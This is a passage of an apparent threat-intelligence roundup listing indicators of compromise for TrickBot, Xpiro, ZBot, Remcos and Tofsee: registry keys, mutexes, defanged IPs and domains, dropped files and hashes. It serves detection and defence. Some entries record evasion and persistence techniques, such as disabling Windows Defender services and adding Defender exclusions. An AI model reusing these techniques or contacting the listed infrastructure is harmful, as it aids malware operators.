c00c0aff84c3007407e20cddf48084d0d9a901a48bd42e7fdaba52c3fef29ccb
c7636ddb181d56f21b5f1e7c64fdcbbbc66e4b674e210abbdab0023e71076e21
ca047344b42f570e61735f6eafe18b774004663c04ec832157a22c04e942b5e1
dd1bedf6550c029e3feb4176589b82a538cf312ea987b825ca71d0ecad7dd5fa
e394c0c4b7a88ae480e7bceb1547f25a6556f805034f2136e7decea7b21e3ebf
ed47d81840428cf3b41a0a79c915fab7068693510a55da3098779682b66e2784
f4118279309f7f0386a7e597bedb9206e4c8596511238ec6b553102c635b6e6cCoverage Product Protection Secure Endpoint
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Secure Malware Analytics
Umbrella
N/A
WSA
Screenshots of Detection Secure Endpoint
Secure Malware Analytics
MITRE ATT&CK Win.Dropper.TrickBot-9902436-0 Indicators of Compromise IOCs collected from dynamic analysis of 25 samples Registry Keys Occurrences <HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159
25
Mutexes Occurrences Global\316D1C7871E10
25
Global\55D74FBE3EF932960
1
Global\024C721EC87932960
1
Global\C788490A242932832
1
Global\ED18DCB472D1128
1
Global\6192C84C2131128
1
Global\ADF342C40B11128
1
Global\8E1024A6929932960
1
Global\8D9B1D2C74B1128
1
Global\8294CCC2330932832
1
Global\3B8754F453D1128
1
Global\A4DE47541D51128
1
Global\8C7A2934A4D1128
1
Global\E075D4D2534932832
1
Global\CFFE388AE22932832
1
Global\C761089E227932960
1
Global\173F762ED8B932960
1
Global\F88B6A74A9D1128
1
Global\7F7903E00F810
1
Global\E40F573A5CE932832
1
Global\09C54C943251128
1
Global\8A367134C4D1128
1
Global\8900A83AA0E932832
1
Global\A7102266899932960
1
Global\D381264E993932960
1
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 23[.]94[.]233[.]210
20
172[.]82[.]152[.]126
17
192[.]3[.]104[.]46
10
192[.]3[.]247[.]11
9
202[.]29[.]215[.]114
1
Files and or directories created Occurrences %System32%\Tasks\Download http service
25
%APPDATA%\NuiGet
25
%ProgramData%\Microsoft\Crypto\RSA\S-1-5-18\396de868fa3d0eba3f5795cb816e1bfd_24e2b309-1719-4436-b195-573e7cb0f5b1
25
\x5c\x55\x73\x65\x72\x73\x5c\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x5c\x41\x70\x70\x44\x61\x74\x61\x5c\x52\x6f\x61\x6d\x69\x6e\x67\x5c\x4e\x75\x69\x47\x65\x74\x5c\xc788\xc11c\xb798\xcc98\xae38\xbaa8\xace0\xb978\xb4e0\x2e\x65\x78\x65
25
\x5c\x50\x72\x6f\x67\x72\x61\x6d\x44\x61\x74\x61\x5c\xc788\xc11c\xb798\xcc98\xae38\xbaa8\xace0\xb978\xb4e0\x2e\x65\x78\x65
25
%APPDATA%\NuiGet\data
25
%APPDATA%\NuiGet\settings.ini
25
%ProgramData%\ .exe
25
%APPDATA%\NuiGet\ .exe
25
File Hashes 0f11dffd9fb6953507a1a42e631725ecfdf731ec199cba6306559cd43cc596bf
11bb23bd4691b1f9bf3df9eb9a7b9314bd093415eda051753f1c018dffa237d2
14f49ad45b8742af26bc4123061127edb2044054fe3871cebc4bdd6eea6ee97f
157ebe4d71a8cebbce89e00bbac423bade5c8f090b0b00670ead7cdd10d9b5b5
1a932426f2605138840adbf25336bf1cb17bd6cc301692f7b0fba27633805321
1d79ed0a029c3477658c315842c72919df37d257ee00c3220c9a4fd0c3c612d7
1e21aa520a7b0a3e3291b5f3e4e87f0e4fb485b282794cdf5896da0cbc171b09
229d33d05887ac47da1ebffc1ccab24d6e144354aaccb2f581122f765e49a12c
261ec70d82a94532d0456e3ba8586d444efea4f682e3bec02da012d0de274256
26b0264ee22e62cff4f7a10c7f0e63131a80ff52598ed5bd2b7e5eb74545115d
2856c0a6e898dcd55aab504b12c2767cc7534370d0e3e4010db124ce55c2d2d9
2da4d4f44256d73fd912a1dff69de2ebebfe02b69c3a2926c7698dd0b64e1abb
305f5b199884b6571519e42d5e585edea3706490b134b5910b5bed1608b28f72
3c67aa6195c01224331078ee11769900e21dc2b04f34539ae4f0bd4d59746e8a
3e80a75d18a80f11b37c670b3eda9a4bb8dcc105563f29f6f658d543c5fe3948
468596e8587d45e0cd8ba0562e6746696342c82a2100e8bbe2af3dc80057c23b
4b71e43a74b174645077ff438f8025e144a4d294e46f2d45d9f73f0b17eff9d0
54fb872b3ffae19e49b48dec775ecde27fe0c526ae0ab976473ad8e944971c4d
5b00857f744180bcd3256effb4e9f11bc9aae28919a4b5209280851d810ae4ad
5e43e28751139969586701890375598315e7dd420d15a6f9ed1f91c1bc576f01
627993dfeda20a7b373910ba2358f108e08f7e09370b45dee5a88010bd4d7d37
63565fa45140ccfa1499e9090a1a907d6ece160de9c90fccc1328e00e9ca7d20
70168a578e3833fa1260aa12c087c05f00c1b07652e2c31c07e6b6b80e3762ca
7560718d9a009c139ca44a4fd04564fbc9541d74d345104da12bf7a1c7833b3b
7a8c9c545c038a238397e1f0a6c4872f6111f201aa5576f9f7326695f9cb6980*See JSON for more IOCs
Coverage Product Protection Secure Endpoint
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Secure Malware Analytics
Umbrella
N/A
WSA
Screenshots of Detection Secure Endpoint
Secure Malware Analytics
MITRE ATT&CK Win.Trojan.Xpiro-9902727-1 Indicators of Compromise IOCs collected from dynamic analysis of 300 samples Registry Keys Occurrences <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
300
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Type
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Type
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Type
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Start
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64
Value Name: Type
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64
Value Name: Start
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
Value Name: Type
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
Value Name: Start
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IDSVC
Value Name: Type
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IDSVC
Value Name: Start
300
<HKLM>\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500
300
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM
Value Name: EnableSmartScreen
300
<HKLM>\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: EnableNotifications
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Start
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ALG
Value Name: Start
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EHRECVR
Value Name: Start
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EHSCHED
Value Name: Start
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FAX
Value Name: Start
300
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS
Value Name: Startup
300
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\USER SHELL FOLDERS
Value Name: Startup
300
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Start
300
Mutexes Occurrences Global\mlbjlegc
300
eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-18
28
Global\Media Center Tuner Request
28
Global\ffhkdgel
1
Global\c5c24301-2684-11ec-b5f8-00501e3ae7b6
1
Global\kcmldfhb
1
Global\fhedadig
1
Global\dcdkelde
1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 64[.]70[.]19[.]203
1
69[.]16[.]231[.]59
1
91[.]203[.]144[.]150
1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences computer[.]example[.]org
2
wpad[.]example[.]org
2
isatap[.]example[.]org
1
_ldap[.]_tcp[.]dc[.]_msdcs[.]example[.]org
1
vmss-prod-eus[.]eastus[.]cloudapp[.]azure[.]com
1
vmss-prod-weu[.]westeurope[.]cloudapp[.]azure[.]com
1
xezlifewvupazah[.]ws
1
aninamilixif[.]ws
1
amonuwezed-picriv[.]ws
1
ytocmoxjedkiciten[.]biz
1
r8decub-ydyg[.]ru
1
upojawnixly-muro[.]cc
1
juwlewrifithal[.]in
1
cakydofytipi[.]biz
1
r8gefa-bugin[.]com
1
aremumhumydoc[.]in
1
r8kegy-bikav[.]com
1
r8myjo-boneb[.]com
1
eletazade-ry[.]org
1
cekhupovoxijyr[.]com
1
Files and or directories created Occurrences %CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE
300
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE
300
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
300
%SystemRoot%\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
300
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
300
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
300
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
300
%System32%\FXSSVC.exe
300
%System32%\alg.exe
300
%System32%\dllhost.exe
300
%System32%\ieetwcollector.exe
300
%SystemRoot%\ehome\ehrecvr.exe
300
%SystemRoot%\ehome\ehsched.exe
300
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log
300
%SystemRoot%\SysWOW64\dllhost.exe
300
%SystemRoot%\SysWOW64\svchost.exe
300
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock
300
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat
300
%LOCALAPPDATA%\rqboqelc
300
%LOCALAPPDATA%\rqboqelc\cmd.exe
300
%System32%\<random, matching '[a-z]{8}'>.tmp
300
%SystemRoot%\microsoft.net\framework\v2.0.50727\<random, matching '[a-z]{8}'>.tmp
300
%SystemRoot%\microsoft.net\framework64\v2.0.50727\<random, matching '[a-z]{8}'>.tmp
300
%SystemRoot%\microsoft.net\framework64\v3.0\windows communication foundation\<random, matching '[a-z]{8}'>.tmp
300
%SystemRoot%\microsoft.net\framework\v4.0.30319\<random, matching '[a-z]{8}'>.tmp
300
*See JSON for more IOCs
File Hashes 02c5c3722753f5199e764a1a7401ef2169e4a04b120adfb3fcfa8fa8e573479c
033bd1f617ca2e15357131d1f5fd4e505664bf46e3bb9dcb560c3bf8bf568a17
04bcabb185bce64e2f16947523abd4af7ad708d5ae78565f0eb73f5541054376
05fe3f283fdaaf87c10739474f229f4ff4e4fb3faf27a2599bcc0e877126e7e0
0668e8eb649e50f45514bba3828861883ea2fde549f4f029dd3f0d8a25bf85b1
066c9e3c5d45399cb40177bb57d9c9db1e350319622fa7f9013b54e3276ae612
06b2bda5827d59b5e5a5d5b9216a73670074077a48560a0c80451fbd347f3af4
080e5a3a63eded752c945560de8d9c0ee483d4644475ef3f991a7f659f7c1089
0a9f501b1ba5c895dd52b15dfc4bdd02400e8af17ae5bb0b8b0dc89cde3a0dc8
0abad4d1c7523a6632bd44cbd1743d46e76ec15ce086cb45d946deb9a1ce78a7
0abc363e5f395818891362bf2c0200ec52890c58b4bf84bcdedc5ec864942a74
0bf25e929d01e2970e95cad27b7d0cc88635e33d2f6afb4f3ac2a4e6281f3a4f
0d0e5dc20240ceceb5a0b05eacf1b8b487740e6c5c90d9c8934ae7183048b783
0e3db161751946523aeccd553b666e7e5524885b463ee04124065835dcc6f53d
0e3f0782a244e2d5c6a4157bf48bbf2be3002f20039d7358221c376634767f5f
0e6cfeb5410e04e85319aefb89a2042ae74437d49ac8f8239eec199309216bfe
0eb6f8335e6aeb57fd17cc34c6fb00548837093741461342672406677b9defb8
11045cab7fff44d58d71b788c797dafda423cd72e4d1741154601ae9ffcdd579
126444ca53c5cee76d16c6d2506568c9fde305a107b5df5aa9b5143a0e3804a3
13d6aae7db9cb703fb07542815bd732ee8911a28de3c8c244c3c515fa4effdfe
14a41d2df64f28c8abfc6ac2ad4e19a8fc7fc21171b61c38d9b9058a4e913bb1
15c30a22113a5b3bf858d2f165d2e3f419193d481c20e8776be3b3c3f897b856
1672f8ebf942084f8f81542c5811097cb9f06aee42a6401028bdbbd618fe0d6e
16f3f4c7541732748f5214a2e1ce407c3c1247798a5b52522a1bf7af14b52b0d
170f54318a5984774331059eb0bc5e6f3675f52ef6e8c2ff55d0d2a5aba7efa6*See JSON for more IOCs
Coverage Product Protection Secure Endpoint
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Secure Malware Analytics
Umbrella
N/A
WSA
Screenshots of Detection Secure Endpoint
Secure Malware Analytics
MITRE ATT&CK Win.Dropper.ZBot-9902454-1 Indicators of Compromise IOCs collected from dynamic analysis of 14 samples Registry Keys Occurrences <HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159
14
<HKCU>\SOFTWARE\MOVIEMFC
14
<HKCU>\SOFTWARE\MOVIEMFC\RECENT FILE LIST
14
<HKCU>\SOFTWARE\MOVIEMFC\SETTINGS
14
Mutexes Occurrences 85485515
14
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 212[.]55[.]90[.]223
1
212[.]55[.]89[.]194
1
212[.]55[.]65[.]63
1
212[.]55[.]73[.]224
1
Files and or directories created Occurrences %System32%\Tasks\aybbmte
14
%ProgramData%\Mozilla\thfirxd.exe
14
File Hashes 07974318326ab72e13607dcaf36d63480a67d4a59d5250e0a3fe884c4b39f43c
478d3a96d340d6a2b90d801b9f1b90fc76b1d2bb8c3bc0a15b0cea09e41f1a75
4d8dcf848fda478f1ffd1d72800df4b1ba1acb33d26a4f865b7baa4dc6db96a1
513aab85abf3fa899ff620f88c0c9434183d2aaa11f07f57a26bd5ee59a2342c
577220b7e683ef541124bb21d840fd1b40b3b37d92369ebc12164917da0a5304
71ce1cb774f2b46d872ab7f14f913d09c2cbe875cfbe8b3841c01df7daa392a4
7f5d60027bb12e660a72f61ed8c68e2efd9b1dfcb2f9999efb74007fd6d76a6c
85e489bb8ee05fed0b809dc2b8229a8a613bb3bea34a8aaa66a295e3ab9327e7
983e5ffc7b37bac5d8ae035a849b6808156decd2a3d6b1fdd0c81d68738d5b75
9ab325109a23d5a58b29058c273394571aa8f7aa92d7e5843907131545c276e7
a3a6c166f16b5ce943b3b4df39f5806f1aef0807acc7bb4eddb3811425d3f4a7
a80dbd2ecbe537c84836ca90539aa0250493350baa433e5db0f4c5b02262d83b
de7a6ea1415783ecdb64a0bb705701da43128e721abdccf11c7a1ef728cfb8fe
ee3e9ea017c0a74ba2086886022a53b63ea366abf6c8feac890b26e88cd1bdcaCoverage Product Protection Secure Endpoint
Cloudlock
N/A
CWS
Email Security
Network Security
N/A
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Secure Malware Analytics
Umbrella
N/A
WSA
N/A
Screenshots of Detection Secure Endpoint
Secure Malware Analytics
MITRE ATT&CK Win.Dropper.Remcos-9903276-0 Indicators of Compromise IOCs collected from dynamic analysis of 15 samples Registry Keys Occurrences <HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159
15
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\INTELLIFORMS\STORAGE2
3
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA FIREFOX
3
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA FIREFOX\20.0.1 (EN-US)\MAIN
3
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA THUNDERBIRD
3
<HKCU>\ENVIRONMENT
Value Name: windir
3
<HKCU>\SOFTWARE\HJTFJYTFCYHNGHNCGHC-O9CPRJ
2
<HKCU>\SOFTWARE\HJTFJYTFCYHNGHNCGHC-O9CPRJ
Value Name: exepath
2
<HKCU>\SOFTWARE\HJTFJYTFCYHNGHNCGHC-O9CPRJ
Value Name: licence
2
<HKCU>\SOFTWARE\PASTANANICEFORWHAT-OMFBDS
2
<HKCU>\SOFTWARE\PASTANANICEFORWHAT-OMFBDS
Value Name: exepath
2
<HKCU>\SOFTWARE\PASTANANICEFORWHAT-OMFBDS
Value Name: licence
2
<HKCU>\SOFTWARE\GGBKGJKIJGVFGHF-N13E67
2
<HKCU>\SOFTWARE\GGBKGJKIJGVFGHF-N13E67
Value Name: exepath
2
<HKCU>\SOFTWARE\GGBKGJKIJGVFGHF-N13E67
Value Name: licence
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Whdvibd
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Ylifala
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Hqqxwss
1
<HKCU>\SOFTWARE\REMCOS-CIQ6B9
1
<HKCU>\SOFTWARE\REMCOS-CIQ6B9
Value Name: exepath
1
<HKCU>\SOFTWARE\REMCOS-CIQ6B9
Value Name: licence
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Owzqggf
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Gazfkfl
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Dkymiyh
1
Mutexes Occurrences Remcos_Mutex_Inj
7
8-3503835SZBFHHZ
2
hjtfjytfcyhnghncghc-O9CPRJ
2
pastananiceforwhat-OMFBDS
2
ggbkgjkijgvfghf-N13E67
2
L50P-7PUFX6AYHMZ
1
S-1-5-21-2580483-90819155372
1
S-1-5-21-2580483-9083183940534
1
80ONCA3AF1DGC91-
1
343P-D-F3U45KF5C
1
76-7BT98W6W18ECA
1
Global\584274e1-301a-11ec-b5f8-00501e3ae7b6
1
Remcos-CIQ6B9
1
47fd345bba97a3052ef471becf32c6d2
1
6528QP5U5H8-5YZz
1
-3747523CC6-w2LZ
1
O094-12BWX2JKxyZ
1
3L8B461U70EZ33HE
1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 34[.]102[.]136[.]180
5
162[.]159[.]130[.]233
3
162[.]159[.]129[.]233
3
184[.]168[.]131[.]241
2
23[.]227[.]38[.]74
2
185[.]157[.]162[.]100
2
185[.]157[.]162[.]241
2
5[.]181[.]234[.]145
2
5[.]181[.]234[.]139
2
162[.]159[.]133[.]233
1
162[.]159[.]135[.]233
1
13[.]107[.]42[.]12/31
1
142[.]250[.]65[.]179
1
86[.]105[.]245[.]69
1
34[.]96[.]116[.]138
1
104[.]161[.]81[.]220
1
37[.]120[.]138[.]222
1
13[.]250[.]255[.]10
1
205[.]164[.]63[.]58
1
209[.]133[.]203[.]146
1
192[.]64[.]116[.]180
1
165[.]32[.]109[.]217
1
156[.]235[.]230[.]246
1
197[.]248[.]5[.]16
1
156[.]235[.]157[.]134
1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences cdn[.]discordapp[.]com
9
onedrive[.]live[.]com
6
rem1[.]camdvr[.]org
2
freelife[.]hopto[.]org
2
freelife1[.]hopto[.]org
2
remman1[.]ddns[.]net
2
pl2byg[.]bl[.]files[.]1drv[.]com
2
bq9ojq[.]bn[.]files[.]1drv[.]com
2
remman2[.]ddns[.]net
2
www[.]dkku88[.]com
1
hwzpgovt[.]nsupdate[.]info
1
www[.]tempestchs[.]com
1
www[.]hfsd1[.]com
1
www[.]fromgoing[.]com
1
www[.]mexico-datacenter[.]com
1
www[.]epicwoodsale[.]com
1
www[.]46t[.]xyz
1
www[.]cataracte-marseille[.]com
1
www[.]tzkaxh[.]com
1
www[.]eidk-55dken[.]com
1
www[.]votifyme[.]net
1
www[.]cis136-tgarza[.]com
1
www[.]sunnysikka[.]com
1
www[.]jahromi[.]foundation
1
www[.]vpayonlinelk[.]com
1
*See JSON for more IOCs
Files and or directories created Occurrences %APPDATA%\remcos
7
%APPDATA%\remcos\logs.dat
7
%PUBLIC%\nest
3
%PUBLIC%\KDECO.bat
3
%PUBLIC%\Trast.bat
3
%PUBLIC%\UKO.bat
3
%PUBLIC%\nest.bat
3
%PUBLIC%\Libraries\Whdvibd
2
%PUBLIC%\Libraries\Whdvibd\Whdvibd.exe
2
%PUBLIC%\Libraries\dbivdhW.url
2
%PUBLIC%\Libraries\Ylifala
2
%PUBLIC%\Libraries\Ylifala\Ylifala.exe
2
%PUBLIC%\Libraries\alafilY.url
2
%PUBLIC%\Libraries\Hqqxwss
1
%PUBLIC%\Libraries\Hqqxwss\Hqqxwss.exe
1
%PUBLIC%\Libraries\sswxqqH.url
1
%PUBLIC%\Libraries\Owzqggf
1
%PUBLIC%\Libraries\Owzqggf\Owzqggf.exe
1
%PUBLIC%\Libraries\fggqzwO.url
1
%PUBLIC%\Libraries\Gazfkfl
1
%PUBLIC%\Libraries\Gazfkfl\Gazfkfl.exe
1
%PUBLIC%\Libraries\lfkfzaG.url
1
%PUBLIC%\Libraries\Dkymiyh
1
%PUBLIC%\Libraries\Dkymiyh\Dkymiyh.exe
1
%PUBLIC%\Libraries\hyimykD.url
1
*See JSON for more IOCs
File Hashes 0aff281c192e919ce8a4e2091a058aa3c8fab2379dd50d7dd7ac7217af4dc838
4a90c0d95b34f54bd38bdc83e548298373289dae63b93de0eb1d92787d3157bc
6b0adce9ecdf4f6ffa0757c0fefe6a5c5a34eed8d8be31e7fb6edf8bf1c7066f
787d592049f8eed9c9ee846c9067a640e89fa19617b03670a97a913738d337f4
7a4c932a221ca312726ee34cd1650e6d1eac557c63b5c9101bc31a9754125b45
97d7e64fe2b669273c0773559e2e329c341a818dafefc5a965cec7cd8553be8f
a2067e35b12b83ddae55145931870302de477b5ccce82a5e86ea7bf8e057d8d7
a2539269c2b9200d7baed9f0dfc25b59fd4713a641d79fd9bd13272c7e1296ca
a86c13560165038405df594a8047e304210fa069cc990c9dad0470187f488bc2
afbecf94557d0ed854e8b06a3da6e73f901fae83ba200c013e684c777c307da1
b44eb5ef1127b377412280cd01950324c63591f8a9bd754363872cf7d2f3955d
c172f7be213d14c5baf25f44467236abbe45a368996b88178c11dee6a9621720
c23190d9c4b457c457fad80fe8842e47026a4a1efddebcc674ff9477b3cd3942
c60a64f8910005f98f6cd8c5787e4fe8c6580751a43bdbbd6a14af1ef6999b8f
ff846b96e943fe0006577be6b3ed30bfad73a0791457933ab5efb69e83d08ae2Coverage Product Protection Secure Endpoint
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Secure Malware Analytics
Umbrella
WSA
Screenshots of Detection Secure Endpoint
Secure Malware Analytics
MITRE ATT&CK Win.Trojan.Tofsee-9903049-1 Indicators of Compromise IOCs collected from dynamic analysis of 303 samples Registry Keys Occurrences <HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config4
303
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
303
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159
303
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: ErrorControl
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: DisplayName
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: WOW64
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: ObjectName
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: Description
18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\mwytphgc
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: ErrorControl
17
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 185[.]7[.]214[.]171
303
185[.]7[.]214[.]210
303
45[.]9[.]20[.]187
303
45[.]9[.]20[.]178/31
303
185[.]7[.]214[.]212/31
303
192[.]0[.]47[.]59
300
144[.]160[.]235[.]143
279
157[.]240[.]229[.]174
263
211[.]231[.]108[.]46/31
260
125[.]209[.]238[.]100
259
142[.]250[.]80[.]100
258
117[.]53[.]116[.]15
249
96[.]114[.]157[.]80
248
103[.]224[.]212[.]34
244
67[.]231[.]149[.]140
235
74[.]208[.]5[.]20/31
235
51[.]81[.]57[.]58/31
220
64[.]98[.]36[.]4
214
216[.]146[.]35[.]35
207
208[.]76[.]51[.]51
188
212[.]77[.]101[.]4
185
62[.]141[.]42[.]208
184
193[.]222[.]135[.]150
182
67[.]231[.]152[.]94
176
67[.]231[.]144[.]94
172
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences 249[.]5[.]55[.]69[.]bl[.]spamcop[.]net
303
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org
303
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net
303
249[.]5[.]55[.]69[.]in-addr[.]arpa
303
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org
303
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org
303
microsoft-com[.]mail[.]protection[.]outlook[.]com
303
microsoft[.]com
303
www[.]google[.]com
303
defeatwax[.]ru
303
whois[.]iana[.]org
301
aspmx[.]l[.]google[.]com
301
whois[.]arin[.]net
300
al-ip4-mx-vip1[.]prodigy[.]net
279
mail[.]h-email[.]net
269
www[.]instagram[.]com
263
mx1[.]naver[.]com
260
naver[.]com
260
mxa-000cb501[.]gslb[.]pphosted[.]com
257
ameritrade[.]com
255
mx1[.]hanmail[.]net
255
nate[.]com
250
comcast[.]net
249
mx1[.]comcast[.]net
249
mx1[.]nate[.]com
249
*See JSON for more IOCs
Files and or directories created Occurrences %SystemRoot%\SysWOW64\config\systemprofile
303
%SystemRoot%\SysWOW64\config\systemprofile:.repos
303
%TEMP%\<random, matching '[a-z]{8}'>.exe
287
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>
61
%System32%\config\systemprofile:.repos
32
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy)
31
%TEMP%\<random, matching '[a-z]{4,9}'>.exe
20
%SystemRoot%\SysWOW64\mwytphgc
18
%SystemRoot%\SysWOW64\nxzuqihd
17
%SystemRoot%\SysWOW64\vfhcyqpl
16
%SystemRoot%\SysWOW64\yikfbtso
16
%SystemRoot%\SysWOW64\kuwrnfea
14
%SystemRoot%\SysWOW64\xhjeasrn
14
%SystemRoot%\SysWOW64\lvxsogfb
14
%SystemRoot%\SysWOW64\fprmiazv
13
%SystemRoot%\SysWOW64\jtvqmedz
13
